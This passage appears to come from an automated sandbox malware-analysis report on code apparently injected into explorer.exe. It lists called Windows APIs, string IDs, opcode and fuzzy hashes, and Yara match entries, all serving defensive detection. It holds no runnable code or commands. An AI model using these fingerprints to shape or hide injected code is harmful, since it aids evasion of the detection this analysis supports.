                          • Opcode Fuzzy Hash: d8a7b21e71a6d189ec4ae80e8a695536de4575df490812d44e91965eea720e90
                          • Instruction Fuzzy Hash: 6911E936269B8482E768DF14F8843DAB7A1F7C8B44F404529EB8A83768DF7CC555CB84
                          APIs
                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,0119108D), ref: 01195A7B
                          • GetProcAddress.KERNEL32 ref: 01195A9A
                          • FreeLibrary.KERNEL32 ref: 01195ABA
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID: SetProcessDPIAware$USER32.DLL
                          • API String ID: 145871493-772676101
                          • Opcode ID: 33176821779897759245a29b6f8084905d367a68fd1873ee8b619ed668c400f9
                          • Instruction ID: 15875971b2eb7bb816fd5a1368ef1745be49901ef003c1f8426ac006b313a0e2
                          • Opcode Fuzzy Hash: 33176821779897759245a29b6f8084905d367a68fd1873ee8b619ed668c400f9
                          • Instruction Fuzzy Hash: 40F0A576554B9082E778DB18F88839977B0F7C8798F440615E78E42A68DF7CC298CB58
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProcVersion
                          • String ID: NTDLL$RtlGetVersion
                          • API String ID: 3310240892-3678323915
                          • Opcode ID: 684692961d127836ff75429e094dc418e1e8dba0610ed999e0bde066ed8978ad
                          • Instruction ID: da3254c1551235c1300a7ee3226949c9759b5a4b3fb2e521323a6ef96c7f2ed7
                          • Opcode Fuzzy Hash: 684692961d127836ff75429e094dc418e1e8dba0610ed999e0bde066ed8978ad
                          • Instruction Fuzzy Hash: C2F07F36644A84C6EB78EB04F8883DAB7A0F388709F800124D78E467A8DF7CC559CF80
                          APIs
                          • _fileno.LIBCMT ref: 011C2C6B
                            • Part of subcall function 011C046C: _errno.LIBCMT ref: 011C0475
                            • Part of subcall function 011C046C: _invalid_parameter_noinfo.LIBCMT ref: 011C0480
                          • _errno.LIBCMT ref: 011C2C7B
                          • _errno.LIBCMT ref: 011C2C99
                          • _isatty.LIBCMT ref: 011C2CFA
                          • _getbuf.LIBCMT ref: 011C2D06
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                          • String ID:
                          • API String ID: 2574049805-0
                          • Opcode ID: d89ba17164b057e40e0230c8c0e126811be590dc0c1f6fea6b6467d498727db7
                          • Instruction ID: b37788867bdbf5e581f6c4f2525a4760bc1e07aa25fc060362069e3f52c77d84
                          • Opcode Fuzzy Hash: d89ba17164b057e40e0230c8c0e126811be590dc0c1f6fea6b6467d498727db7
                          • Instruction Fuzzy Hash: 7141A1B2200B4187DB2C9F2DD48136D7761EBB4FA8F158229DA65473E8EB79C851C781
                          APIs
                          • _fileno.LIBCMT ref: 011B9A81
                            • Part of subcall function 011C046C: _errno.LIBCMT ref: 011C0475
                            • Part of subcall function 011C046C: _invalid_parameter_noinfo.LIBCMT ref: 011C0480
                          • _errno.LIBCMT ref: 011B9A91
                          • _errno.LIBCMT ref: 011B9AAD
                          • _isatty.LIBCMT ref: 011B9B0E
                          • _getbuf.LIBCMT ref: 011B9B1A
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                          • String ID:
                          • API String ID: 2574049805-0
                          • Opcode ID: 56ab89854e5ae769f29630560a6647f2ee0e2c817f8a69632cdb6a676603f6a7
                          • Instruction ID: d972a308b7d1f55826e4cbf24236a399f18923dfb5fc59bbb3550cf237aaa656
                          • Opcode Fuzzy Hash: 56ab89854e5ae769f29630560a6647f2ee0e2c817f8a69632cdb6a676603f6a7
                          • Instruction Fuzzy Hash: E841FFB2210B488ADF1C9F3DD4D06A87B60E798FACF554219DB6A473D5EB38C852C780
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000008,?,011C1953), ref: 011C17F2
                          • malloc.LIBCMT ref: 011C1856
                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000008,?,011C1953), ref: 011C189E
                          • GetStringTypeW.KERNEL32(?,?,?,00000000,?,00000008,?,011C1953), ref: 011C18B5
                          • free.LIBCMT ref: 011C18C9
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$StringTypefreemalloc
                          • String ID:
                          • API String ID: 307345228-0
                          • Opcode ID: 965fe8bdf943ed1d4c82f4e81ed16d9202ccaf85f4f541d8b62d894c124712f2
                          • Instruction ID: 1e9d4af1da5e16b0689ea0147d6aa74f4630ac0ca09a176cac87fdcda9bd2d8d
                          • Opcode Fuzzy Hash: 965fe8bdf943ed1d4c82f4e81ed16d9202ccaf85f4f541d8b62d894c124712f2
                          • Instruction Fuzzy Hash: C631A032744B80DAEB189F2A984039A6796FB98FF8F584219EE29477D5DF38C4018340
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                          • String ID:
                          • API String ID: 738346648-0
                          • Opcode ID: ad9b6ddeba1b68a4c7a9c77c2e9740dbed4c8849dfcb5610010ed651666c2a0a
                          • Instruction ID: 589e6b91a1f450d5f2f19b2dfcf62a6bcd16ad429d41013671984c3e15f7ea65
                          • Opcode Fuzzy Hash: ad9b6ddeba1b68a4c7a9c77c2e9740dbed4c8849dfcb5610010ed651666c2a0a
                          • Instruction Fuzzy Hash: E851F532205B00C5DB58CB18E8C13A9A3B1F7E8748F61952AE69F467B4EF7DD586CB00
                          APIs
                          • Concurrency::task_options::get_continuation_context.LIBCPMTD ref: 01193E89
                          • Concurrency::task_options::get_continuation_context.LIBCPMTD ref: 01193E9D
                          • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 01193EAD
                          • type_info::_name_internal_method.LIBCMTD ref: 01193ECF
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Concurrency::task_options::get_continuation_context$Affinity::operator!=Concurrency::details::Hardwaretype_info::_name_internal_method
                          • String ID:
                          • API String ID: 3678748506-0
                          • Opcode ID: afd68561e62c96723d4451579b545c313aa908728ce77bd132829953e4c85a52
                          • Instruction ID: d4b9298aec1ffa74c2b43db638351e67e945ab3471508b6024a3b0a3a0d9c6de
                          • Opcode Fuzzy Hash: afd68561e62c96723d4451579b545c313aa908728ce77bd132829953e4c85a52
                          • Instruction Fuzzy Hash: A221AA36228B4581CF18DB5AE49011EB771F7DABD8B604012EFAE87B28DF3AC551CB41
                          APIs
                          • WSACreateEvent.WS2_32 ref: 011B4768
                          • WSAEventSelect.WS2_32 ref: 011B478F
                          • WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B455A), ref: 011B47E4
                          • WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B455A), ref: 011B47F3
                          • WSACloseEvent.WS2_32(?,?,?,?,?,?,?,011B455A), ref: 011B4859
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$Close$CreateEventsMultipleSelectWait
                          • String ID:
                          • API String ID: 2166016019-0
                          • Opcode ID: fe6704b44bee5829474ada4c8b3fd0bec09b15791c55a24a43108b7d94ecef9f
                          • Instruction ID: bb2e3591794de7d25dabce1e2da19d3a1e789ee4e2e8f14da60a9f6e6d458863
                          • Opcode Fuzzy Hash: fe6704b44bee5829474ada4c8b3fd0bec09b15791c55a24a43108b7d94ecef9f
                          • Instruction Fuzzy Hash: B9310832528B84CADB559F19E48479ABBB0F385B84F109115FB9A43F6ACB7DC045CF01
                          APIs
                          • WSACreateEvent.WS2_32 ref: 011B4648
                          • WSAEventSelect.WS2_32 ref: 011B466F
                          • WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B45A0), ref: 011B46C4
                          • WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B45A0), ref: 011B46D3
                          • WSACloseEvent.WS2_32(?,?,?,?,?,?,?,011B45A0), ref: 011B4739
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$Close$CreateEventsMultipleSelectWait
                          • String ID:
                          • API String ID: 2166016019-0
                          • Opcode ID: 29ccdf6b33a1163324ee7db4502d6237d9ce27e33d28bec132fa8e2cb9d649a2
                          • Instruction ID: 829e91c64f0294f9ed4eaff8c4c5940348aa70880ef3cc5f6d104263ec9f9d96
                          • Opcode Fuzzy Hash: 29ccdf6b33a1163324ee7db4502d6237d9ce27e33d28bec132fa8e2cb9d649a2
                          • Instruction Fuzzy Hash: 8F31FA36128B44CADB69DF19E48479ABBB1F386784F609115EB8A43F69CB7DC045CF01
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Create$CloseEventHandle$Thread
                          • String ID:
                          • API String ID: 3315681087-0
                          • Opcode ID: c08934f3fb2d49f487da2c55ee1254e5b5f920426d6448e0e42077e6a3dbbbae
                          • Instruction ID: 22e2d7c8091fdfb5755504fddb30fd9a1ddba3e755fd96187b2920e356d62be1
                          • Opcode Fuzzy Hash: c08934f3fb2d49f487da2c55ee1254e5b5f920426d6448e0e42077e6a3dbbbae
                          • Instruction Fuzzy Hash: 3921D370600A0482FB2CEB65FA59BD636A0F354359F09663DDA5642EE0CFBD81EBC740
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event
                          • String ID:
                          • API String ID: 4201588131-0
                          • Opcode ID: c7270ca6cd0027a95c3a079b4d1d8a70d46683f4405f6999b971fa87d8febae7
                          • Instruction ID: 5c5c62325498c7401a28fd97be80d903f960f857e4ef682080ea0eabbbcd4edb
                          • Opcode Fuzzy Hash: c7270ca6cd0027a95c3a079b4d1d8a70d46683f4405f6999b971fa87d8febae7
                          • Instruction Fuzzy Hash: 5F212036608B88C7CB28DF09E49425AB7A1F7C8B99F505229EA8D47B29CB7CC555CF04
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event
                          • String ID:
                          • API String ID: 4201588131-0
                          • Opcode ID: 2f43e1411a86ff65ae186fbf4826b3099ba5d0dc06b99c4c62602528d5f33b84
                          • Instruction ID: b8b44067b2317f145cdcd8ad31f962470e50e3d536c9dc324d050b1c9b4d8d50
                          • Opcode Fuzzy Hash: 2f43e1411a86ff65ae186fbf4826b3099ba5d0dc06b99c4c62602528d5f33b84
                          • Instruction Fuzzy Hash: 2C214276608B8887D728DF05F05435AB7A1F7C8B99F505229EA8D47B28CB7CC555CF40
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32 ref: 011BF76B
                          • GetCurrentProcessId.KERNEL32 ref: 011BF776
                          • GetCurrentThreadId.KERNEL32 ref: 011BF782
                          • GetTickCount.KERNEL32 ref: 011BF78E
                          • QueryPerformanceCounter.KERNEL32 ref: 011BF79F
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                          • String ID:
                          • API String ID: 1445889803-0
                          • Opcode ID: c6e65f6b01b94b13fd23f4a7e6283f519103931d797bfc6ffacafbbc56e53864
                          • Instruction ID: 4b72a264ced5bfcdbe50f5d636e436b01f7a438500b399e0d823a1bb3090dbf6
                          • Opcode Fuzzy Hash: c6e65f6b01b94b13fd23f4a7e6283f519103931d797bfc6ffacafbbc56e53864
                          • Instruction Fuzzy Hash: F7014C31265E048AEB849F25F9843D573A1F789F90F446624EF5E477A4DB3CC99AC340
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 195467ecf0e9b39d0823af2e41b7a61e96f13688144912d81077017081ad5b3c
                          • Instruction ID: 5f30f31e1bd3662ac042f2ed7fe5fa5ae51fc6d7d7da47a1c511918fd48db1b4
                          • Opcode Fuzzy Hash: 195467ecf0e9b39d0823af2e41b7a61e96f13688144912d81077017081ad5b3c
                          • Instruction Fuzzy Hash: ECF090B271168986DE0E2B68E9D03ED7A909FB0F7AF564719D62E0B3E1C73C44418721
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: 09f05515462f461276196ec69aeeb838aed65b65ebbc682e0a595f35ac473647
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: 09f05515462f461276196ec69aeeb838aed65b65ebbc682e0a595f35ac473647
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: 89e3dd46865cacff1dddaff1f35aeff22daad2851f05acaa26d29de09fad9b17
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: 89e3dd46865cacff1dddaff1f35aeff22daad2851f05acaa26d29de09fad9b17
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: 3779b9ff62c45535a73ea4ad58ab9b58cc22196be243de00855a3174e99cfd9c
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: 3779b9ff62c45535a73ea4ad58ab9b58cc22196be243de00855a3174e99cfd9c
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: 3f4a609b6b85ce19b629f703ee1c45849e5e308dee8cee7de8996c57758e9cd8
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: 3f4a609b6b85ce19b629f703ee1c45849e5e308dee8cee7de8996c57758e9cd8
